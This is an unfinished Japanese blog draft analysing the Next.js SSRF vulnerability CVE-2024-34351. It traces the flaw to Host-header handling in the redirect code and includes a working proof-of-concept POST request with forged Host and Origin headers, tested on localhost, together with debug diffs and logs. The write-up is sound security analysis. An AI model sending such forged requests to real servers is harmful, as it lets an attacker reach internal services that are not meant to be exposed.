---
title: "Next.jsのSSRF脆弱性 CVE-2024-34351"
emoji: "⚠️"
type: "tech" # tech: 技術記事 / idea: アイデア
topics: ["react", "nextjs"]
published: false
---

Next.jsで**SSRF**（=Server Side Request Forgery）の脆弱性が発覚したことが話題になったので、調査した内容をまとめておこうと思います。対象の脆弱性は以下です。

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34351

https://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g

## 脆弱性の概要

SSRF脆弱性は本来到達できないサーバーに対して、公開されてるサーバーを経由してアクセスすることができてしまう脆弱性です。

https://blog.tokumaru.org/2018/12/introduction-to-ssrf-server-side-request-forgery.html

今回のNext.jsの脆弱性はhttpヘッダーの`Host`を書き換えることで、self hostingなNext.jsサーバーからhttpリクエストを送信できてしまうというものです。これは、外部には公開してない内部APIに対してリクエストを送信できる可能性も含まれます。

この脆弱性は以下の条件を満たした時に成立します。

- Next.jsをself hostingで運用している
- Next.jsアプリケーションがServer Actionsを利用している
- Server Actionが`redirect()`を`/`から始まるパスで呼び出している

これらの条件を満たす時に、SSRF攻撃が成り立つ可能性があります。

### 最新バージョンでの状況

> There are no official workarounds for this vulnerability. We recommend upgrading to Next.js 14.1.1.

とある通り、本脆弱性は`v14.1.1`ですでに解消されているとされています。ただし、カスタムサーバー（expressやfastify）を利用している場合、後述する環境変数`__NEXT_PRIVATE_HOST`を設定しないと**この脆弱性が解消してない可能性があります**。

:::message alert
実装を確認した限りカスタムサーバーでは解消してない可能性が高いですが、筆者は未検証で実装を元に述べているので、これらの条件が当てはまる方は自身で脆弱性の有無を検証することをお勧めします。
:::

## 脆弱性の原因実装と詳細

脆弱性が解消されたとされるのがv14.1.1なので、v14.1.0時点での実装を元に説明します。今回の脆弱性は`redirect()`を呼び出した時の処理に起因しています。

`createRedirectRenderResult`は命名の通り、`redirect()`を呼び出した時に返されるRSC Payloadを生成する関数です。

https://github.com/vercel/next.js/blob/v14.1.0/packages/next/src/server/app-render/action-handler.ts#L147C16-L153

この関数の中でリクエストオブジェクトの`Host`を参照し、`fetchUrl`を生成しています。

https://github.com/vercel/next.js/blob/v14.1.0/packages/next/src/server/app-render/action-handler.ts#L160-L163

そしてそれをそのまま、`fetch`の引数に利用しています。

https://github.com/vercel/next.js/blob/v14.1.0/packages/next/src/server/app-render/action-handler.ts#L183-L190

つまり、`Host`を書き換えればこのフォーマットに沿ったURLを生成することができ、任意のサーバーにリクエストを送信することができてしまうのです。ただし、上記実装ではHEADリクエストが成功しないとGETリクエストに進まないので、v14.1.0時点では**HEADリクエストのみが対象**となります。

### 実際に攻撃が成り立つのかlocalhostで試してみる

実際に筆者はこの挙動を確認すべく、v14.1.0のNext.jsをbuildしてform submit時のリクエストを元に改ざんし攻撃を試みたところ、`Host`と`Origin`は一致してる必要があるため`Origin`も修正する必要がありました。ただ、この2つを書き換えれば実際にリクエストを発行している様子が観察されました。

:::details 攻撃http request
実際に画面からformをsubmitした時のリクエスト情報をコピーし、`Host`と`Origin`を書き換えたものです。
```http
POST http://localhost:3000/ HTTP/1.1
Accept: text/x-component
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: ja,en-US;q=0.9,en;q=0.8
Connection: keep-alive
Content-Length: 279
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBxBctGejLCXmkZbu
Host: localhost:9999
Next-Action: 2436a10b19c8cb512110aa93eaeb1eedad656714
Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%5D%7D%2Cnull%2Cnull%2Ctrue%5D
Origin: http://localhost:9999
Referer: http://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"

------WebKitFormBoundaryBxBctGejLCXmkZbu
Content-Disposition: form-data; name="1_$ACTION_ID_2436a10b19c8cb512110aa93eaeb1eedad656714"


------WebKitFormBoundaryBxBctGejLCXmkZbu
Content-Disposition: form-data; name="0"

["$K1"]
------WebKitFormBoundaryBxBctGejLCXmkZbu--
```
:::

`createRedirectRenderResult`内に以下のようなdebugコードを追加して、consoleの様子も確認しました。

```diff
  const fetchUrl = new URL(`${proto}://${host}${basePath}${redirectUrl}`)
+ console.log(">>> fetchUrl", fetchUrl);
```

```diff
  const headResponse = await fetch(fetchUrl, {
    method: 'HEAD',
    headers: forwardedHeaders,
    next: {
      // @ts-ignore
      internal: 1,
    },
  })
+   .catch((err) => {
+     console.error(">>> HEAD Request error", err);
+     throw err;
+   });
```

攻撃httpリクエストを送信すると以下のようなログが出力されました。

```text
>>> fetchUrl URL {
  href: 'http://localhost:9999/?test=1',
  origin: 'http://localhost:9999',
  protocol: 'http:',
  username: '',
  password: '',
  host: 'localhost:9999',
  hostname: 'localhost',
  port: '9999',
  pathname: '/',
  search: '?test=1',
  searchParams: URLSearchParams { 'test' => '1' },
  hash: ''
}
>>> HEAD Request error TypeError: fetch failed
    at Object.fetch (node:internal/deps/undici/undici:11730:11)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at async globalThis.fetch (/Users/satouakifumi/work/git/sandbox/nextjs-debug/.next/server/chunks/535.js:1:123496)
    ...
```

TBW

## 脆弱性の原因となった箇所の周辺実装

TBW

### Server Actions+redirectの挙動
